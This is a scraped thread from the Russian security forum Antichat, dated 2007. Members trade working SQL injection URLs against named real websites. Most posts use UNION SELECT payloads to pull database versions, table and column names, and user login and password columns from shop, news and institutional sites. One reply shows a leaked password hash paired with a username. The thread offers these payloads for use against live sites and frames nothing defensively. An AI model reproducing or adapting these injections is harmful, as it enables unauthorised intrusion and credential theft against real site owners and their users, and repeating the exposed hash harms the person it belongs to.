HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1321  
Старый 23.03.2007, 18:08
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Вывод в title'е:

Код:
http://www.rosmed.ru/news.php?act=by_id&news_id=-1+union+select+convert(concat(comp_domain,char(58),comp_user_fio,char(58),comp_user_mail,char(58),comp_user_pass,char(58),comp_addr_phone),char),2+from+comp/*
 
Ответить с цитированием

  #1322  
Старый 23.03.2007, 18:08
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://english.dvb.no/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #1323  
Старый 23.03.2007, 18:20
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

www.tal-shop.se
Код:
http://www.tal-shop.se/index.php?id=5&cid=-38+union+select+concat(passwd,0x3a,id_user,0x3a)+from+users/*
Код:
http://www.spinter.net/page.php?id=-22+union+select+version(),user()/*
Код:
http://www.gmstz.edu.ba/vijesti.php?id=-64+union+select+1,database(),3,4,5/*
 
Ответить с цитированием

  #1324  
Старый 23.03.2007, 18:26
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Даже char() не потребовался, как знали =))
Код:
http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,2,user(),database(),version(),6,7,8,9+from+users/*
Это ответ недавнему "великому" взлому удава... 3 действия)
Код:
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.TABLES/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,COLUMN_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.COLUMNS/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,id,concat_ws(char(58),FIO,Login,PasWD),8,9,10,11,12,13,14+from+accounts/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1325  
Старый 23.03.2007, 18:36
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

centresh.ru
Цитата:
http://www.centresh.ru/article.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(use r(),0x71),0x71),6,7/*
 
Ответить с цитированием

  #1326  
Старый 23.03.2007, 19:43
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

колонку с паролем не смог найти -
Код:
http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user+limit+2000,2001
Код:
http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user(),char(64),version(),char(64),database())
 
Ответить с цитированием

  #1327  
Старый 23.03.2007, 19:49
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.polirem.ua/polyukr/news.phtml?id=-16+union+select+concat_ws(char(58),user(),database(),version())/*
симпотишная =\
Код:
http://www.skitours.com.ua/news.phtml?id=-13763+union+select+1,concat(version(),char(58),user()),password,id,database(),6,7,8,9,10,11+from+users/*
Код:
http://www.kharkov-sport.com/news.phtml?id=-1326+union+select+1,2,database(),version(),5,6,7,8,9,10,user()/*&print=yes
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1328  
Старый 23.03.2007, 20:41
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

www.rootkitshield.com
Код:
http://www.rootkitshield.com/links/dead.php?id=-8+union+select+1,2,3,4,version(),6,7,8,9/*
 
Ответить с цитированием

  #1329  
Старый 23.03.2007, 21:07
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

www.mashinki.ru
Код:
http://www.mashinki.ru/news.shtml?id=-93+UNION+SELECT+1,2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #1330  
Старый 23.03.2007, 21:38
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

to InferNo23
Цитата:
колонку с паролем не смог найти -
Код:
http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user/*
8fb8b4736f9f74bb1d301491e1798b08:Martin
 
Ответить с цитированием
Ответ





Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ